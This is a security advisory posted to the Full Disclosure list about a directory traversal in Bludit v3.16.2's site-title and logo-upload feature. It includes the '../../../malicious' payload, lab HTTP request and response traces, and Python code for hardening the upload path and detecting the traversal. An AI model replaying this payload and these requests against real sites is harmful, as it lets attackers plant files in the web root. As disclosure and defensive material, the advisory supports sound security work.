Bludit v3.16.2 Directory Traversal Vulnerability: In-Depth Analysis

This article discloses in detail the directory traversal vulnerability in Bludit v3.16.2, including the exploitation steps, the HTTP request/response details and the SVG file upload process, and shows how a malicious payload achieves path traversal and XSS. It is intended as a reference for security researchers.

Exploit Title: Directory Traversal "Site Title" - Bludit v3.16.2

Date: July 2025

Exploit Author: Andrey Stoykov

Version: 3.16.2

Tested on: Debian 12

Blog: https://msecureltd.blogspot.com/

Directory Traversal "Site Title" #1:

Steps to Reproduce:

  1. Log in with the admin account and go to "General" > "General Settings"
  2. Set "Site title" to the following payload: "../../../malicious"
  3. Next, click on "Logo" and upload an SVG file

// HTTP POST request

POST /bludit/admin/settings HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 1208
Origin: http://192.168.58.133
Sec-GPC: 1
Connection: keep-alive
Referer: http://192.168.58.133/bludit/admin/settings
Cookie: BLUDIT-KEY=re283ptc2s1pd9emfuqhiulto2
Upgrade-Insecure-Requests: 1
Priority: u=0, i

[…]title=htdocs/bludit/bl-content/uploads/../../../malicious[…]

// HTTP response

HTTP/1.1 301 Moved Permanently
Date: Sat, 28 Jun 2025 21:27:33 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[…]

// HTTP POST request uploading the SVG file

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[…]

------geckoformboundaryb7a89b3d43771e77a278c9384a361332
Content-Disposition: form-data; name="tokenCSRF"

59fc6f48ad5d60b39699491cada2390e1b42531b
------geckoformboundaryb7a89b3d43771e77a278c9384a361332
Content-Disposition: form-data; name="inputFile"; filename="evilsvgfile-xss-bypass.svg"
Content-Type: image/svg+xml

------geckoformboundaryb7a89b3d43771e77a278c9384a361332--

// HTTP response

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:28:21 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[…]

{"status":0,"message":"Image uploaded.","filename":"../../../malicious.svg","absoluteURL":"http://192.168.58.133/bludit/bl-content/uploads/../../../malicious.svg","absolutePath":"/opt/lampp/htdocs/bludit/bl-content/uploads/../../../malicious.svg"}

root@debian:/opt/lampp/htdocs# ls -lah
total 16K
drwxrwxrwx  3 root   root   4.0K Jun 28 17:28 .
drwxr-xr-x 31 root   root   4.0K Jun  3 16:26 ..
drwxrwxrwx  7 debian debian 4.0K Aug 25  2024 bludit
-rw-r--r--  1 daemon daemon  283 Jun 28 17:28 malicious.svg

// HTTP GET request fetching the SVG file

GET /malicious.svg?time=0.3289154512636364 HTTP/1.1
Host: 192.168.58.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
[…]

// HTTP response

HTTP/1.1 200 OK
Date: Sat, 28 Jun 2025 21:28:21 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
Last-Modified: Sat, 28 Jun 2025 21:28:21 GMT
ETag: W/"11b-638a8794da6e3"
Accept-Ranges: bytes
Content-Length: 283
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/svg+xml
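The root cause visible in the traces above is that the site title is spliced into the logo file name without validation, so its ".." segments are honoured when the file is written. As an added illustration (not Bludit's code, written in Python rather than PHP), the following sketches the containment check the upload path is missing, beside the vulnerable pattern, and a helper that flags an upload response like the one shown. UPLOADS_DIR mirrors the absolutePath on this page; the function names and the sample JSON are constructed for the example.

```python
import json
import posixpath
import re

# Assumed base directory, mirroring the absolutePath in the upload response above.
UPLOADS_DIR = "/opt/lampp/htdocs/bludit/bl-content/uploads"


def unsafe_logo_path(uploads_dir: str, site_title: str, ext: str = "svg") -> str:
    """Vulnerable pattern: the user-supplied site title becomes the file name
    without validation, so '..' segments walk out of uploads_dir."""
    return posixpath.join(uploads_dir, f"{site_title}.{ext}")


def escapes_uploads(path: str, uploads_dir: str) -> bool:
    """True if the lexically normalized path lands outside uploads_dir."""
    root = posixpath.normpath(uploads_dir)
    return not posixpath.normpath(path).startswith(root + "/")


def safe_logo_path(uploads_dir: str, site_title: str, ext: str = "svg") -> str:
    """Hardened pattern: reduce the title to a safe base name (no separators,
    dots or NULs), then still verify the final path stays inside uploads_dir."""
    base = re.sub(r"[^A-Za-z0-9_-]", "_", site_title).strip("_") or "logo"
    candidate = posixpath.normpath(posixpath.join(uploads_dir, f"{base}.{ext}"))
    if escapes_uploads(candidate, uploads_dir):
        raise ValueError("logo path escapes the uploads directory")
    return candidate


def flag_upload_response(body: str, uploads_dir: str) -> dict:
    """Detection helper for the JSON the logo-upload endpoint returns:
    normalize absolutePath and report whether it left uploads_dir."""
    data = json.loads(body)
    resolved = posixpath.normpath(data["absolutePath"])
    return {"resolved": resolved, "traversal": escapes_uploads(resolved, uploads_dir)}


# Constructed sample, modelled on the upload response shown on this page.
SAMPLE_RESPONSE = (
    '{"status":0,"message":"Image uploaded.","filename":"../../../malicious.svg",'
    '"absolutePath":"/opt/lampp/htdocs/bludit/bl-content/uploads/../../../malicious.svg"}'
)

if __name__ == "__main__":
    print(flag_upload_response(SAMPLE_RESPONSE, UPLOADS_DIR))
    print(safe_logo_path(UPLOADS_DIR, "../../../malicious"))
```

The normalized path of the sample response is /opt/lampp/htdocs/malicious.svg, which matches where the directory listing above shows the file landing.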

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/